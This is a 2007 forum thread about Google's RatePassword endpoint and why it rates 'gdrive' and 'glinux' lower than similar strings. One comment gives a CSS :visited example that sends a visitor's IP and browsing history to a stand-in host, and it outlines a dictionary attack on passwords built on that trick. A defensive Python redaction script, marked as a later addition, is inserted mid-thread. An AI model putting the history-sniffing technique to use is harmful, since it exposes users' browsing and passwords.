Google Blogoscoped

Forum

Google password rating dictionary recognizes "gdrive" and "glinux" keywords

David Bloom [PersonRank 1]

Saturday, January 6, 2007
14 years ago, 12,427 views

You can get a "password strength" rating from Google by using https://www.google.com/accounts/RatePassword?Passwd=[password]. This is used by the "change password" page on Google Accounts to show a bar indicating password strength.

This rating not only considers password length, capitalization, and the use of numbers as well as letters, but also the use of various dictionary words.

For example, https://www.google.com/accounts/RatePassword?Passwd=password , https://www.google.com/accounts/RatePassword?Passwd=gmail , and https://www.google.com/accounts/RatePassword?Passwd=google all give the lowest possible rating of "1", because "password", "gmail", and "google" would be insecure passwords for a Google account. https://www.google.com/accounts/RatePassword?Passwd=blogger and https://www.google.com/accounts/RatePassword?Passwd=googlemail both give a rating of "2".

Interestingly, https://www.google.com/accounts/RatePassword?Passwd=gdrive gives a rating of "3", even though similar passwords of similar length and complexity such as https://www.google.com/accounts/RatePassword?Passwd=gsearch or https://www.google.com/accounts/RatePassword?Passwd=gstore give the highest rating of "4". I also observed that https://www.google.com/accounts/RatePassword?Passwd=glinux has a rating of "3" even though https://www.google.com/accounts/RatePassword?Passwd=gunix and https://www.google.com/accounts/RatePassword?Passwd=gbsd have a rating of "4".

TOMHTML [PersonRank 10]

14 years ago #

Maybe they just use their index? "Gdrive" is in 882000 pages, "GLinux" in 22000, my passwords in 0 pages.

Sam Davyson [PersonRank 10]

14 years ago #

Is it safe to Google your passwords? Hmm I guess so. They appear in your search history – but to see it you need the password anyway.

Ramibotros [PersonRank 10]

14 years ago #

If it's being googled server to server then there's no problem and it doesn't mean it should appear in your search history.

David Bloom [PersonRank 1]

14 years ago #

Sam:

Google logins use SSL encryption but Google web search does not use encryption, so it is not safe to Google your passwords.

Pierre S [PersonRank 10]

14 years ago #

Moreover, if it's a specific password, it might get spotted. Not very interesting though.
But Googlers say they see really weird things on the live query screens at Google.

David Bloom [PersonRank 1]

14 years ago #

Also, it is possible to use clever CSS to reveal whether a visitor to your website has visited a specific URL (for example: #foobar:visited { background: url('http://example.com/user_has_visited?ip=123.45.67.89&addr=http://foobar.com'); }). Although the simple CSS example I provided requires a server callback, with more elaborate code this is not necessary and all processing can be done in JavaScript (for IE/Opera, use a javascript: URL as the background; for Mozilla, attach an XBL binding to the :visited and detect based upon a constructor call). Basically, this could be used to easily run a dictionary or even brute force attack on your password by tricking you into visiting a page.
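Added example, not part of the original thread: the RatePassword URLs quoted above carry the password in the query string, so it is stored wherever the URL is stored (browser history, proxy logs, Referer headers). This Python sketch finds and redacts such parameters in log or history lines; the parameter names other than Passwd and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names treated as secret-bearing. "Passwd" is the one used by the
# RatePassword URLs in this thread; the others are assumed common names.
SENSITIVE = {"passwd", "password", "pass", "pwd"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def redact_url(url):
    """Return (redacted_url, [names of sensitive params that held a value])."""
    parts = urlsplit(url)
    found, pairs = [], []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SENSITIVE and value:
            found.append(name)
            value = "REDACTED"
        pairs.append((name, value))
    if not found:
        return url, []  # leave untouched URLs byte-for-byte identical
    return urlunsplit(parts._replace(query=urlencode(pairs))), found

def scrub_line(line):
    """Redact every URL in one log/history line; return (line, hit_count)."""
    hits = 0
    def repl(match):
        nonlocal hits
        new, found = redact_url(match.group(0))
        hits += len(found)
        return new
    return URL_RE.sub(repl, line), hits

# Constructed sample lines (proxy-log style), not real traffic.
SAMPLE = [
    "10.0.0.5 GET https://www.google.com/accounts/RatePassword?Passwd=dogcatrat 200",
    "10.0.0.5 GET http://www.google.pl/search?hl=en&q=my%20password 200",
    "10.0.0.7 GET https://example.com/login?user=bob&PWD=hunter2&next=%2Fhome 302",
]

def scrub_all(lines):
    return [scrub_line(line) for line in lines]

if __name__ == "__main__":
    for text, hits in scrub_all(SAMPLE):
        print(hits, text)
```

The second sample line is left unchanged: a password typed as a search term sits in an ordinary `q` parameter and cannot be recognised by parameter name.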

FerRory [PersonRank 1]

14 years ago #

I think the 1 to 4 ratio is a little bit of cr*p because my most insecure password I use, only letters, is four.

Scott [PersonRank 0]

14 years ago #

Hmm....
A lv 4 password is pretty secure eh?

I think I'm going to run out and change my pass to something more secure like dogcatrat
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat
cause it is just as secure as my old password:
dogcatrat553495248985699!4059
according to G:
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat553495248985699!4059

ketra [PersonRank 0]

14 years ago #

you may want to look at:
http://nion.modprobe.de/blog/archives/497-Dont-use-Googles-password-validation-script.html

Ludwik Trammer [PersonRank 10]

14 years ago #

> Basically, this could be used to easily run a dictionary or even brute force
> attack on your password by tricking you into visiting a page.

I think it's easier to run a dictionary attack on your password itself ;) You would notice if a page attempted to load a page with links to every possible word ;) And Google's search URLs differ depending on many factors. For example my search URL goes like this – http://www.google.pl/search?hl=en&lr=&safe=off&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aofficial&hs=to3&q=my%20password&btnG=Search

Brian Mingus [PersonRank 10]

14 years ago #

For the 1 trillion word corpus they recently released, they considered any string that occurred more than 200 times a word, IIRC.

David Bloom [PersonRank 1]

14 years ago #

Ludwik:

It's not hard to determine what someone's Google search URL format is – for example, an HTTP referrer header could be used to determine it.

Haochi [PersonRank 10]

14 years ago #

"1[put at-character here]3" (without quote) is a pretty secure password. :) Lv. 4.
